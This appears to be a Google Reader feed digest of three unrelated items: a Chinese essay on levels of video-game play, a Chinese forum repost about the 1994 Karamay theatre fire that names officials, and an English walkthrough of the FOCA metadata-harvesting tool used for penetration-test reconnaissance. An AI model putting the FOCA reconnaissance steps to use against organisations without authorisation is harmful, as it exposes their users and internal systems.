Sent to you by l5g via Google Reader:
Things you can do from here:
- Subscribe to cnBeta.COM using Google Reader
- Get started using Google Reader to easily keep up with all your favorite sites
jiffy debian
一位大师给他的新徒弟解释"道"。"道存在于所有软件之中,不管是多么渺小的软件," 大师说。
"手持计算器中有道么?" 徒弟问。
"有道," 大师回答。
"游戏中有道么?" 徒弟继续问。
"就连游戏中都有道," 大师说。
"那么 DOS 操作系统里也有道么?"大师咳嗽一声,身体微微动了一下,"今天的课程结束了," 他说。
– 翻译自 Geoffrey James, The Tao of Programming。
当一个人玩游戏的时候,他玩的是什么?当然,现在中文论坛给的流行答案是"寂寞"。据说是罗切斯特大学的研究结果,说游戏之所以让人上瘾是因为满足了人的心理需要:一个人的现实生活很平庸无聊,而在游戏中却可以呼风唤雨横扫千军。不管是寂寞论还是心理论,根本上都是说,电脑游戏,是 loser 的天堂。
曾经有过一个调查显示,与中国玩家大都是大中学生不同,美国游戏市场的最大消费人群,是一帮三十岁以上身体超重的宅男。可见游戏玩家的整体形象的确不怎么样。尽管如此,打游戏并不是一个特别愚蠢的活动。
我一贯敬重那些打游戏上瘾的人,就如同干一项事业一样,他们忠诚于游戏,有 commitment 。游戏为什么好玩?这个问题的答案不仅仅关乎游戏,更关乎我们对事业的追求。打游戏有三个境界。
游戏的第一个境界是好玩。首先是"现实感",或者说"超现实感"。一个游戏让人一看就觉得好玩,凭的就是能特别逼真的"做事"。比如说《魔兽世界》的一句宣传口号是"做你从未做过的事"。我在现实生活中从来没有机会拿一把斧子跟人对砍,从来没使用过魔法,更从来没骑乘过大鸟在天上飞。我从来没指挥过军队,没灭过别人的国家,实际上,我从来没当过英雄。在游戏里我可以做这些事情,如同做了一个好梦。
但这种现实超现实感只能短期内吸引人,再好看的电影,每天都看一遍也会无聊。一个游戏要做到有趣,要让人一整天杀怪而不觉得烦闷,还有一个诀窍,叫做"随机"。
杀死一个怪物之前,你不知道它会掉落什么。多数情况下可能只是一点布料和小钱,但存在某种可能性,它会掉落一件精良甚至史诗级的装备。人们沉迷于这种随机性,热爱这种小意外,好赌,真是人的天性啊。
一个沉浸在这种"好玩"境界中的玩家是快乐的。游戏是他们生活中的消遣和点缀。他们"玩"游戏,而不是"被游戏玩"。但这种浅尝即止走马观花的游戏者并不真正懂得游戏。这种低境界的玩家就好像在海边玩耍的小孩子,他们偶尔被几个好看的贝壳所吸引,而完全不能欣赏身边游戏世界的汪洋大海。
"被游戏玩",才是高境界。一个真正热爱游戏的人打游戏并不总是轻松快乐的。真正的游戏玩家有时候甚至是拼命的,因为他们知道不吃苦就永远不会到达顶峰。游戏的第二个境界是追求成就感。
如果成就感仅仅是为了成为全服务器第一高手也就罢了。但为什么会有人为了凑齐一套装备反反复复地刷副本?为什么有人甚至为了仅仅是为了"打钱"而不眠不休地在一个地方杀怪甚至不惜因为这种纯低端的体力劳动而被人嘲笑?更重要的问题是,他们为什么不把这个精神用在真实世界中的学习和工作上?
这是因为有两件事只存在于游戏之中:第一,"世间自有公道,付出总有回报";第二,也是更重要的一点是,回报是即时的。
打赢一场仗,经验值立即上升,战利品立即到手。这个规则看似简单,在现实生活中却是非常少见的。即时的回报会给做事的人一个正反馈,使他马上更投入地继续工作,这种正反馈一旦运行起来,只有人的身体素质这种生理极限才能限制他的工作强度。我们经常看到一个政府职员在上班时间悠闲地看报纸,而一个小商贩却可能在工资更低的情况下拼命地加班加点地高强度工作,其中根本的技术原因是这个小商贩的每一个动作都立即转化为收益。即时正反馈,就是游戏上瘾动力学。
这个道理的应用是怎么从管理角度建立一个即时回报的系统。不过我觉得这种系统在很多情况下并不实用。这个反馈会把任何人置于连续的高强度工作,似乎只适合于简单体力劳动。因为脑力劳动者需要自由的空闲时间来想事儿。一个科学工作者如果陷入这种正反馈之中,比如每一篇论文都带来几万块钱奖金的话,将是非常可悲的事情,他会变成只会写论文的机器。而另一方面,体力劳动现在大多都是生产线,需要各人之间的配合,而不希望单独一个人凭借自身素质好逞英雄。
一个玩家一旦陷入这种即时正反馈系统之中,他就成了游戏的奴隶。我是尊敬这样的玩家,但有人可能会鄙视。另有一种玩家,却是值得所有人敬仰。
这就是游戏的第三个境界,体育和科学的境界。进入这个境界的玩家不是"玩"游戏,而是"训练",甚至是"研究"游戏。他们不再对升级和获得装备之类的事情兴奋,他们追求的是技艺。
几年前玩《魔兽世界》的时候,我看过很多这样的玩家写的技术文章。各种令人眼花缭乱的武器,技能和魔法的性质,对他们来说都是基础知识。他们对每一次升级后的技能修改都敏感。他们试炼作战过程中的攻击方向和步法。有些暴雪拒绝公布的细节,比如说"威胁值"的计算公式,他们用搞科研的精神,去野外找怪物做实验。然后他们把发现写成一篇论文。
达到这个境界的玩家把打游戏变成了一个体育运动,甚至是一项科学研究。他们可以反复打某个单机游戏中的同一张地图而不觉枯燥,因为他们追求的不是简单的快感,而是更高的技艺水平,是艺术。他们仿佛在游戏之中,又好像在游戏之外。
所以打游戏实在是一个可大可小的事情。如果你随便玩,你只能体验一点小小的快乐情调。如果你陷入即时正反馈系统不能自拔,你会获得更大的乐趣,和痛苦。只有当你进入更高的境界,你才可能成为游戏中的泰格伍兹,甚至是 Matrix 中的 Neo.
国耻日的眼泪与愤怒
http://q.sohu.com/forum/20/topic/4524954
——以此纪念伟大的光荣的正确的"让领导先走"15周年
若你看完,你会流泪...我不知道有几个80后的人知道这场大火,不知道有几个人还记得这件惨绝人寰的事...但是我可以确定的告诉大家,但是如果这288个天真美丽可爱的中小学生还在的话,都和我们年纪相仿,可惜现在现在都在天堂里哭泣.....
大家看见这些举着相片的人海了吗?大家看见这些照片上的天真的笑脸了吗?大家看见这些家长的表情了吗? 我第一次看见这张图片我震撼了,288个家庭举着自己最亲儿女天真烂漫的照片,大家可以看见右下角的摄影师好象刚哭过,你仔细看会发现很多人正在哭...
15前事情再想起克拉玛依大火
15年前那场大火至今回响着一句话:"学生们不要动,让领导先走!"国内官员的丑陋,在火难中曝光!无耻,永远写在官员的脸上!克拉玛依的大火, 映照出国内官僚最鄙陋残忍的一面。
一、新疆克拉玛依市1994年12月8日大火
1994年12月8日,新疆克拉玛依市教育局官僚为欢迎上级派来走走样子的"义务教育与扫盲评估验收团"的25位官员,组织全市最漂亮的能歌善舞的中小学生796人在友谊馆剧场举办"专场文艺演出"。
因舞台纱幕太靠近光柱灯被烤燃而引起火灾。当燃烧的火团不断地从舞台上空掉下时,克拉玛依市教育局的官员出来叫学生们:"大家都坐下,不要动!让领导先走!"
学生们很听话,都坐在自己的位子上不动;等上级政府与教育局所有在场的26个官员都从第—排撤退到最后一排的出口处"先走"了之后,教师才开始组织学生撤离,但此时电灯已全灭,大火已蔓延到剧场四周,唯一的逃生之路已被熊熊火焰堵住!(当时剧场只开放一个安全门,其余安全门均锁着)于是,学生们撤离火灾现场的最佳时机最关键时刻已被错过了!
796名来自全市15所中小学的师生(每所学校组织最漂亮的40多名学生歌舞队)全部陷入火海之中,323人死亡,132人烧伤致残(注,另有一说:死325人,伤136人;此处采用法院判决书的数字);死者中有288人是天真美丽可爱的中小学生。
在场的有40多名教师,有36位遇难,绝大部分为掩护学生而殉职。
在场的克拉玛依市副处级以上官员有20几个,当时他们的位置离火源最近,离逃生门最远,竟"奇迹般"地无—人伤亡,而且走出剧场门口时还个个衣冠楚楚!
小西湖墓地静悄悄,无人打扰长眠的孩子们
二、至今没有追究"让领导先走"的法律责任
当时的报道均承认:有克拉玛依市教委的官员在火灾现场命令"学生不要动!让领导先走!"也有报道文章指出:本来可以避免这么多的学生伤亡,只因"让领导先走"而耽误了!所以"让领导先走"大大扩大了学生的伤亡人数!
事实很清楚,是克拉玛依市教委的主持官员葬送了学生逃生的时间与机会!造成了本来可以避免或减少的学生大批死亡的惨剧!作为大人,明知火灾的危险,却把孩子留置于死地而不顾,无异于故意杀害孩子!
这么大的罪恶,竟被新疆的高级检察院、法院视而不见,至今没有追究其法律责任!更令人愤慨的是,至今十年了,没有听到当事人对此说过—句哪怕是后悔内疚的忤悔话!所以我们决不能饶恕或忘掉他们的罪行!
全国人民多年来—直在追问:究竟是谁在大火之前宣布:"学生不要动!让领导先走!"?人民有权力查清这个罪魁祸首!并把无耻两字永远刻在它的脸上!我查了多年的资料,法院始终没有审理此项内容,连媒体的报道也故意将名字隐匿不报,不过众多报道众口—词地说是"市教委的—个领导"!
查法院判决书和当时媒体报道,在火灾现场的市教委领导有如下2人:
唐舰,原克拉玛依市教委副主任。
况丽,原新疆石油管理局教育培训中心党委副书记。
其余的均是科长或以下的小官,称不上"市教委领导",也无权主持大会?
所以,宣布"学生不要动,让领导先走"罪恶命令的人,不是唐舰,就是况丽?或两者均是!
考虑到唐舰更符合"市教委领导"的身份,所以唐舰应是下达"学生不要动,让领导先走"罪恶命令的最大嫌疑人!
令人悲愤的是,对此罪大恶极之人,法院轻轻地判了它,媒体轻松地放过了它!
方天录,新疆石油管理局副局长(克拉玛依当时是个仅有20万人口的油城,新疆石油管理局的副局长相当于市长。),在场的最高长官,不指挥打开所有安全门和组织学生疏散,只顾自己逃命。尽管他只被火星烧焦了几绺白发,仍然一头钻进小轿车直奔医院找医生"检查身体";尽管途中顺路经过消防队大门口,它也不下车报案。以玩忽职守罪仅判处有期徒刑5年
赵兰秀,克拉玛依市副市长,在火灾发生时仅是叫—个人走出去报警,也不指挥打开所有安全门和组织学生疏散,只顾自己逃命。被判处有期徒刑4年6个月; (以上二人是此次演出活动的主要领导人)
唐舰,原克拉玛依市教委副主任。同样不指挥打开所有安全门和组织学生疏散,"只顾自己逃"(法院判决书语),以玩忽职守罪判处有期徒刑5年。
况丽,原新疆石油管理局教育培训中心党委副书记。同样不指挥打开所有安全门和组织学生疏,"只顾自己逃生"。她凭借著对友谊馆地形的熟悉钻进了厕所,又凭著成年人的力气,把原本可塞三十人以上的厕所反锁顶上,任凭孩子们哭喊也绝不开门;事后在厕所门外地上发现一百多具学生尸体。她还骄傲地告诉记者,"自己的逃生知识有多丰富"。以玩忽职守罪判处有期徒刑4年。
朱明龙,市教委普教科科长。同样不指挥打开所有安全门和组织学生疏散,"只顾自己逃生"。判处有期徒刑4年。
赵征,市教委普教科副科长。仅组织舞台北侧的部分学生演员撤离,"忽略了"舞台南侧的学生演员,也犯玩忽职守罪,免予刑事处分。
(以上四人是此次演出活动的具体组织者和实施者)
另外,还有十多名市局领导,没人出面指挥学生逃生,没人向被大火包围的孩子们伸出援手。
阿不来提·卡德尔,友谊馆副主任。犯有重大责任事故罪,被判处有期徒刑6年。
原友谊馆主任兼指导员蔡兆锋,虽发生火灾时出差在外,但平时对友谊馆存在的不安全隐患不加整改(舞台纱幕离光柱灯仅23厘米,早被消防部门通知整改,却明知不改),对火灾的发生负有直接责任,判处5年徒刑。
友谊馆的服务人员陈惠君、努斯拉提·玉素甫江两人,未在场内巡回检查,火灾发生后不履行应尽的职责,未打开安全门,反而逃出馆外;陈惠君判处6年徒刑。努斯拉提·玉素甫江刑罚不详。
1995年10月再报道—次法院的轻微判决以后,全国的媒体再也不敢吭声,国内人民对此责问道:
那么多孩子为了让领导先走, 牺牲了自己, 他们死得无声无息.?
那么多普通教师为了救学生, 牺牲了自己, 他们的姓名有几个被人所知?
更卑鄙的是克拉玛依市当局,当时在全国媒体上宣布:将在火灾现场友谊馆建立火灾纪念馆,以纪念那些死去的孩子,并警示后人。可是,至今过去了十年时间,什么纪念馆一个影子也不见!仅把己烧毁的友谊馆全拆了,空地成了空荡荡的—片"人民广场",只剩下那些孩子的冤魂日夜在广场上徘徊。全国人民又被克拉玛依市的臭官僚大大愚弄了一回!
有网友指出:"即便在封建王朝,如果城池破了,县官是要死节的。现在的**连封建道德都没有了!"
"这样一个人间惨剧,如果发生在任何一个地方,那么责任的追究,将直指最高领导部门,都得引咎辞职。"领导害死了人民仍在当领导,而小学生听了领导的话却永远学不到生!
为连战献花的北大女孩是克拉玛依火灾幸存者王媛媛
三、15年后,现在仍是"让领导先走"
15年前,"让领导先走"酿成了一场国内人民的大灾难。伤亡之惨烈、后果之惨重,并没有给当局与官僚任何触动!15年来,全国各地官员仍然热衷于组织中小学生的"热烈欢迎"、"热烈庆祝"的队伍,以孩子的天真笑脸,为官员的虚荣捧场。
有时看到那些可爱的乖孩子们,被强令丢下学业,排队站在街头路边,忍饥挨饿地累了大半天,就是仅为了迎接那些臭大人,为了让它们的豪华车队"先走",我就满腔愤慨!
有网友指出,是孩子们的牺牲,才换来官员们的"先走"!是广大工人的下岗失业,才实现了一部分人先富起来"!是广大人民的高学费高房价高医疗费的沉重负担,才撑起了城市的高楼大厦和官员的现代化豪华办公场所!
15年后,央视在今年曝出了"请大家猜一猜,别斯兰的学校人质事件中死亡的孩子的数量是多少?猜中有奖!"的丑闻,就充分说明了这些马屁精的丑恶残忍本性丝毫未改!
15年前,让孩子留于死地而不顾!十年后,猜一猜孩子死了多少?
------国内官僚与马屁精的残忍与麻木,可谓与时俱进?
所以有网友建议:应该在克拉玛依大火灾难现场建立纪念碑,刻上浮雕,画面是一群脑满肥肠的官员践踏着稚气未脱的儿童在"先走"。碑上篆刻上血红色的一句话:"让领导先走!"
300座不同的坟墓,却刻着相同的时间1994年12月8日
四、怀念那些掩护孩子的教师
在此次火灾中,唯一让人怀念与尊敬的是那些以自己的血肉之躯掩护孩子的教师。据报道:克市第八小学三年二班的老师孟翠芬是一位己经办了退休又返聘的白发苍苍的老人,"人们在扑灭大火后发现她时,孟老师的头和背已被烧焦。但是,她的两只臂肘下一边护着一名学生,其中一名学生的心脏还在微弱跳动,他还活着!"
"第八小学校长张莉和市一中副校长倪振性,都是几次把学生推出火海,自己最后被大火烧得面目全非。然而他们的遗体都是张开双臂,还像母鸡护着小鸡一样,在墙边围护着几位死去的学生。"
"市第七中学的周健老师,在大火袭来时,正用力撑着往下落的卷帘门。"他只要向前跨一步,就可以脱离火海,可是他—直坚持着站在原地用肩膀撑起铁门,"活着的学生看见他最后三次用一只手往外推出三位学生,最后倒了下去"
第一小学的大队辅导员李平老师,"戴着眼镜,瘦弱的身影好几次冲进火场救出十几名学生,直到再也无法靠近猛烈的火焰时,这位老师才一下子身体一软靠到墙上,她大喊了一声:'我的孩子还没出来!'接着就昏倒在地。"
人们后来发现许多老师的遗体,不是张开双手拉学生,就是扑在学生的身上-----老师们在危难时刻,分明是在以自己的血肉之躯,在最后掩护孩子!
这次火灾中有40多位老师在场,就有36位遇难殉职!这些教师不愧是在烈火中永生的英雄!可惜国内媒体令人惊诧地不作详细报道,也没有广泛宣传,使我们至今不知晓他们更多的英雄事迹!还有更多未被报道过的老师英雄,谨在此献上衷心的敬意!
过了15年,很多人感叹,现在的老师大不如以前了!假如再次发生火灾,还会有那么多老师在火线上殉职吗?所以人们更加怀念旧时的过去的老师!全国人民永远怀念在克拉玛依大火中永生的师恩!
对此,国内网友在克拉玛依大火十周年之际,被迫发出最后的吼声:
"民选的官员为百姓,官选的官员为自己"
"让领导先走,是全世界几百年来最无耻的语言!"
"先走的领导不配做领导,不配做人,不配做动物,他们是地球的病毒"
"和古代唯一的区别.老爷改成了领导.更无耻.虚伪.更丧尽天良"
"这就是中国血淋淋的现实。究竟谁是最残忍的人?正是这些既得利益者们。这场大火,把什么都说清了吧!"
"别斯兰的孩子死了,有全世界的人献花。新疆的孩子死了,死了就死了。为什么?"
"那些领导和那些马屁精是最卑鄙的!"
"恶的**让人性泯灭!"
"迟早要还的,要把它写进中国的历史."
有网友回忆了1990年前的「泰坦尼克号」沉船之难:由于船上人多而救生艇不足,许多资产阶级富翁和贵族人士不是利用各种优势"先走",而是纷纷主动让出逃生机会,坚持让妇女儿童先上救生艇,一位富翁为此留下遗言:"我决不会让一个妇女儿童先我而死,我要死得象一个男子汉!"
在国内所有媒体对克拉玛依1994.12.8大火再一次失忆失声之际,我遥望戈壁滩上的蓝天白云,想起那些在大火中挣扎呼救的美丽可爱的孩子,想起那些以血肉之躯最后掩护孩子的可敬老师,我要大声诅咒那些"先走的"无耻残忍之徒!
我想,为了这个从不敢直面现实又经常失忆失声的民族,为了我的孩子孙子今后永远不会置身于火海之中,我总结了一句话:是的,该让领导先走,让它们先走进地狱吧!
广场山300多盏路灯,每一个代表着一个亡灵
幸存者
1994年12月9日,清晨,茫茫白雪飘洒向新疆克拉玛依大地。
片片雪花中,一名叫吴磊的男孩像往常一样背着书包走进市第八小学。他推了推自己教室三二班的门,教室的门此时却紧紧地锁着……教他这个班的女体育老师以惊异万分的目光走过来扶着他。当小吴磊低着头说他前一天因为没有按老师的要求穿演出服装,结果不能参加汇报演出时,女老师禁不住猛然紧紧抱着他放声大哭……小吴磊就在这揪心的哭声中,渐渐明白了身边发生了巨大的悲剧。他幼小的心灵从此再也无法忘记——除他之外,全班42名同学,39名已经被烈焰吞噬,另外3名重伤的同学正在医院抢救。在这场震惊校内外的特大火灾中,和吴磊的同学们一起遇难的共有288名中小学生,还有37名教师和干部。
克拉玛依,你怎么能一下子上演这么沉重的悲剧,如何忍受得住这么深痛的哀伤!在这来自四面八方的恸哭声中,这入冬以来的第一场雪,将它那洁白的雪花默默地从苍天飘落,把大地覆盖……如果时光能够倒流,但愿没有12月8日这一天。可是无情的时光却偏偏流逝到这一天的下午6时10分,克拉玛依友谊馆的舞台上几块被烤燃的纱幕布条,忽然落在796名师生和干部面前!这里云集的可是全市7所中学、8所小学精心挑选的15个规范班的优秀师生啊。
刹那间,大幕起火,火势蔓延,灯光熄灭,烈焰毒烟突然绝情地扑向那些天真可爱的中小学生,扑向那些清贫辛勤的园丁!
第八中学的音乐老师张艳,先从烟雾中冲出来给姐姐张荣打了电话:"姐,友谊馆着火了,快来帮我救学生!"她丢下电话又端起一盆水冲进火场。从此,她再也没有出来。就在这一天,29岁的张艳还请姐姐给她梳了辫子,姐姐看着她离开了家门。
黄文华是测井公司第二小学的校长,她的18名学生正准备登台演第二个节目时,烟火骤起。她急忙和音乐老师带着学生跑向侧厅,可是火也窜到了头顶。黄校长看见出口处的木门开始着火,门口跌倒堆积的学生太多,她拼命把学生往外拖,往外抱。
阿米娜是第二中学初三班的班主任,她已冲出剧场,回头看见还有许多学生在里面叫喊,又转身冲进火场……她没有能够出来。
第六小学校长王愫岩眼看大火突起,马上抱起两名学生就冲出来。她一看馆内烟火翻腾,急得哭出声来:"我的孩子们还在里面呀,我的学生们呀……"王校长哭喊着迎着浓烟冲了进去,又抱出两名学生。当她含泪吸了一口气又冲进去后,人们再也看不见她的身影了。
第八小学三二班的孟翠芬老师已经当了23年的班主任了,她连获市优秀班主任和十佳教师称号。两个月前,孟老师已办理了退休手续,由于学校和家长的一再请求才重登讲台。人们在扑灭大火后发现她时,孟老师的头和背已被烧焦——但是,她的两只臂肘下一边护着一名学生,其中一名学生的心脏还在微弱跳动,他还活着!
第八小学校长张莉和市一中副校长倪振性,都是几次把学生推出火海,自己最后被大火烧得面目全非。然而他们的遗体都是张开双臂,还像母鸡护着小鸡一样,在墙边围护着几位死去的学生。真是桃李同悲,师生生死与共!人们后来发现许多老师和大人的遗体,不是张开双手拉学生,就是扑在学生的身上……老师们在危难时刻,分明是在全力奉献出自己的身心,吐丝求尽啊!市第七中学的政教主任周健老师,在大火袭来时,正用力撑着往下落的卷帘门。活着的学生曾看见他一只手三次用力往外推出学生,最后倒了下去……不久前他刚领了结婚证,新婚妻子和他商定元旦举行婚礼。亲属最后找到他时,是从领带夹上认出来的。
人们还看见身材高大的女老师李月霞当时正用有力的肩膀使劲撑着铁门,拼命喊着,让学生们一个一个逃出去。后来,她因窒息倒在大门旁边……友谊馆外照相点工作人员袁金芳亲眼目睹了这样一位永远也忘怀不了的中年女老师:她戴着眼镜,瘦弱的身影好几次冲进火场救出十几名学生,直到再也无法靠近猛烈的火焰时,这位老师才一下子身体一软靠到墙上,她大喊了一声:"我的孩子还没出来!"接着就昏倒在地。她就是第一小学的大队辅导员李平老师,起火时她的孩子离她只有几步远,她一下子抱起两名学生冲出大门。当她又一次抱起学生冲出大门的时候,铝帘门突然滑落下来将她卡在门下。她当即用手死死顶住大门,接着门外的人用力拉,她的孩子在里面使劲推,才把她救出。李老师当时亲耳听见""自己的孩子被隔在门里的烟火中喊叫着:妈妈!妈……"可是她怎么也无法冲进去了,硬是眼睁睁地听着自己心爱的孩子哭喊声渐渐消失。尽管她当时双手和脸部已被严重烧伤,她还是发疯一样的踢门、砸门……最后在极度的悲痛和伤痛中大喊一声,昏了过去。
第六小学副校长毛明新救出了6名学生,他的孩子最后也被火舌吞没。
恩师难忘啊,死里逃生的学生们怀念着心爱的老师。第三小学的媛媛向记者述说:"有一扇窗户开着就在我旁边,我想爬上去,可窗子太高怎么也够不着。这时一双手把我抱起,我爬上窗户回头一看,是一位上了年纪的老师。"小媛媛一想起那张和自己奶奶一样慈祥的脸,和那双难忘的大手,她就止不住流出晶莹的泪水,"没有那位老师我肯定活不了,也不知她是死还是话……"9岁的男孩马玉和被从剧场抢救出来送进医院后,醒来睁开眼睛时,伤口剧痛,嗓子干裂得难以说话。他在纸条上歪歪扭扭地写了一句话,请护士送给正在病房门外焦急等候的爸爸妈妈。父母一看儿子小纸条上写的字,忍不住眼泪夺眶而去,"王老师出来没有?也不知她怎么样。"
这次火灾中有40多位老师在场,就有36位遇难殉职,其中有5位是校长。
克拉玛依大火的灾难,却烧不尽许许多多催人泪下的人间真情。
石油管理局生活服务总公司的女工朱华,那天特意请假并借了一台摄像机,为9岁的女儿王悦拍摄舞蹈镜头,准备以后给出差在外地的王悦爸爸看。当她正在会场外排除摄像机卡带故障时,突然看见友谊馆里大火窜起。她把摄像机交给同事,迎着往外涌的人群发疯一样地往剧场里冲,拼命喊着:"王悦,我的悦悦呀!你在哪儿啊,妈来救你来了……"朱华在烟火滚滚的馆内先拖出两名奄奄一息的学生、冒着撕心裂肺的毒烟硬往火海里冲。人们想拦住她,"不能进去,已经晚了!"可是,好一位做母亲的朱华,硬是挣脱开大家的阻拦,一头又冲进烧得发红的馆内……后来,在医院太平间里,母女俩的遗体紧紧挨靠在一起。当出差的丈夫从千里之外回来看见母女俩一大一小两口棺材时,顿时哭得死去活来,一头撞上前去,鲜血染红了脑门和棺材……还有一名品学兼优的女孩子,几年前父母离婚后,一直与靠卖冰棍为生的母亲相依为命。母亲咬牙不再嫁,下决心要把女儿培养成优秀的人。哪想到爱女没能逃离火海,噩耗传来,母亲字字声声哭喊着女儿,几度昏倒在冰棍箱前。
邮电局职工刘震新正骑着摩托准备到友谊馆对面的商场买东西,得知友谊馆起火,他才猛然想起自己11岁的女儿刘洁也在里面参加演出。他扑向前去,两名浑身烧伤的学生迎面跑过来喊他:"叔叔,救救我。"刘震新骑上车一边把两名学生送往医院,一边流泪哭喊着女儿的名字。当他再赶回来时,友谊馆里面已是一片火海,他急得跺着脚哭嚎:"洁洁!爸爸救你来了……"职工总医院烧伤科主任张树林的13岁女儿,在火场里救出自己的老师后,才坐上三轮车到医院向爸爸报告火情。张主任一看见多处烧伤的女儿,知道好几百学生在那里演出,顾不上先救女儿,马上向医院方面报告灾情组织抢救。
儿科副主任阿丽娅当时看见一下子抬进来这么多烧伤的学生,心里顿时缩成一团。她清楚地记得孩子早晨上学离家时还问:"妈,你能来看我们演出吗?"如今面对身边一大群哭叫的孩子,她抱起来就开始抢救。当亲属跑来告诉她,孩子还没回家时,阿丽娅热泪涌出,说了一句:"你们去找找吧,我还要抢救这些孩子……"当亲属再一次低着头慢慢走进来时,她心里不幸的预感终于证实了,泪还没有流出来,就身子一软瘫倒在抢救台前。
普外科护士长马晓晋正准备下班时,友谊馆第一批烧伤学生被送了进来,她一看见顿时愣住了,因为孩子今天说要去友谊馆开什么会。马晓晋来不及多想,马上开始抢救伤员,她对同事们说了一声:"你们抢救时,帮我看看有没有我的孩子,有告诉我一声。"然而不幸的事还是出现了,同事真的发现了她的孩子,可是马晓晋的宝贝已经永远闭上了眼睛,大家忍着悲伤都不敢告诉她。最终,马晓晋还是在白布下面看见了自己的心肝,当即就倒在地上。当同事们含着泪扶起她时,她眼睛直呆呆地,无力地摇摇头说:"别管我,去救别的孩子……"突如其来的巨大灾难,令克拉玛依人一时难以相信就发生在大家身边,人们哀伤的心相互搀扶着,面对无情的现实。
当时在友谊馆附近拉乘客的三轮车夫把受伤的学生抱到车上,拼命地一趟一趟往医院送;周围许多汽车也开过来运送伤员;对面的木红商场立即送来救援用的毛巾、口罩、手电筒。接着,全市娱乐场所关闭;护士们把病房的镜子都用纸糊住,生怕孩子们看见自己烧伤的面容;开照相馆的残疾青年,免费加紧扩放死难师生的遗像;被服厂的工人们呜咽着赶缝了三百套棉被和棉衣、棉裤,她们说:"不能让可怜的孩子再冻着了……"短短的几天里,通往郊外路上的冰雪被送葬的车队和伤心的脚步融化了。成群结队的爸爸、妈妈们搀扶着白发苍苍的爷爷、奶奶们,到成吉思汗山脚下为他们的心肝宝贝送葬。大片的墓地上,白发人送黑发人,父母亲送继承人,老师埋学生,学生葬老师。正如墓上挽联文:""苍天无眼丧我学子,看油城万民同伤悲人间多情哀思齐天,望泉下魂灵早安息克拉玛依的大地上,几日里堆起三百多座新坟,苍茫黄土里,一下子掩埋这么多天使一样纯洁的魂灵。
死难学生的家长为第八小学优秀老师孟翠芬送葬时,对着她的遗像说:"老师,是您没有让孩子的面容和身子被火烧,我们感谢您,老师。孩子在学校交给你,我们放心;在地下,孩子跟你走,我还是放心。"家长们送到坟上来的挽联字字饱含激情:想教育教学生14岁的小于航墓前放着一个生日蛋糕,这是他妈妈特意为12月8日爱子的生日订做的全市最大的一种蛋糕。于航那天说功课太忙,想到周末时请同学们到家里一起享用,没想到他在生日遇难。父母周末在家中把儿子的生日蛋糕和他爱吃的饭菜摆在遗像前,就这样陪着过了一夜。第二天又随儿子的棺材送到坟前,令在场的人们不禁低头垂泪。
高子寅同学的母亲在女儿的坟前久久不忍离开,她从女儿的衣服口袋里找到了6元钱,这是女儿准备捐给"希望工程"的。这位53岁的母亲含泪对着爱女的坟发誓:一定要满足女儿的愿望!第三中学初二三班的8名学生,生前是非常要好的伙伴。他们的父母们相互请求,将8位曾经相处如兄妹的同学合葬在一处,家长们用红砖紧紧围着8座相依的新坟茔。
不知道为什么,我昨天发的帖子被管理员删了?我的目的很简单:就是要我们80后不知道的人看看.看看为什么和我们年纪相仿的288个兄弟姐妹现在在天堂哭泣,就是因为那句话:学生不要动,让领导先走.从现在开始,大家的每一个回贴我都会看的.
我不知道为什么有美女的帖子点击率那么高?而这样的帖子看的人寥寥无几?.做为大学生的社区,难道我们的年轻人就是这样?对美女不断追求,对历史不闻不问?????可悲!!!!!这次帖子要是被删了,我就不准备发了,我留在我的博客里,我自己看一辈子!!我自己为288个兄弟姐妹祈祷,抚慰他们的受伤的心!!!!
克拉玛依大火的遗址。当年出事的礼堂现在成了"友谊馆"
受伤后的12年中,杨柳每天都躺在床上。父母在她受伤后,被允许生了第二胎,也就是现在活泼可爱的小杨晨。
受伤的杨柳拿着自己受伤前的照片,她的10个指头只有3个能动,其他都粘在一起
杨柳这双曾经在钢琴键上飞舞的手,和妹妹的小手一起轻轻弹拨的情景,催人泪下
1
演出开始前的照片孩子们哪里知道这将是他们生前的最后一张照片啊
看的出来孩子们离出口更近!~~~
三百孩子遇难,这真是古今中外骇人听闻的灾难啊,除了战争年代的,和平年代几乎没有比这更悲惨的事件了吧?
在克拉玛依大火面前,为什么喊出最无耻的"让领导先走"?领导是干什么的?为人民服务的?对人民的下一代,对祖国的花朵,应该高度负责,孩子不走,你走了,还有脸活着吗?不嫌给党和政府抹黑丢脸吗?什么叫代表人民根本利益?大火面前,让孩子先走,让他们活下去,就是人民的根本利益!是祖国的未来!
很多同学看完文章之后都是义愤填膺,谈一下个人的看法,首先我也是拥护中共 因为有了中共才有了我们现在的生活环境 我们才能在这里安静的上网 同时也希望我们的祖国日益昌盛 但是每个国家都有这样那样的不为人知的秘闻 可能随着网络或者高科技的发展会逐渐揭开神秘面纱 转发这条帖子的的想法很简单 就是让我们80后也知道我们国家所发生的痛楚 我们国家的少数腐败分子的不作为 少数官员的无能
目的只有一个 希望所看到的人心灵受到震撼 发愤图强 自己成为国家的一名公务员的时候 以身作则 不要使我们国家再次发生这样的悲剧。
One very important part of any pentest is the gathering of information of the target network that will be attack and on area that is gaining a lot of traction is the enumeration thru metadata. A tool I recently learned about by listening to the great podcast Exotic Liability where they mentioned the FOCA tool by Informatica64 when talking about their presentation at Blackhat Europe 09 you can either download the FOCA tool or you can use the webpage to summit your document for analysis. I do prefer to do most of my analysis locally since on almost all pentests I have conducted all information is confidential and the sharing of information with third parties is not permitted . This tool will analyze metadata from Microsoft Office Documents, PDF files, Open Office Files and Word Perfect files, EXIF Metadata out of images and the best part is that you can add the files you collected manually or found and downloaded thru web searches using Google and Live Search witch makes it extremely flexible for pentests. it will enumerate Users, Folders, Printers, Emails and the version of Software used to create the file. This tool will run on Windows XP and Windows Vista, I found it to be really unstable in Windows 7 Beta.
After downloading run the setup executable and the tool will be available in the start menu under programs. Once you execute the application you should see a screen line this one:
You can press Project –> New Project and start a new project where you give the Project Name, the Website to enumerate for documents and a give it a place to download and store the documents.
You can also instead choose to add a single file or folder of files that you have gathered previously via email, social engineering or any other way by Righ-Clicking with the mouse on the document list area and choose either the Add File or Add Folder option.
When you select to create a New Project you the screen will change in the following manner giving you the option of which files to download and what search engine to use.
But what if the file type you are looking for is not in the options like PNG or JPG? you can click on the Custom Search link and enter the Google query your self or add filetype:<extension> like it is shown in the image below.
For the following screenshots I will enumerate and download only doc files from Blackhat.com, so I hit search and you can see the files that where found, one it has finish you can righ click and download only specific files of choose to download them all. Once Downloaded you can righ-click again on them and choose to extract the metadata of a single file or select to extract the metadata of all the files.
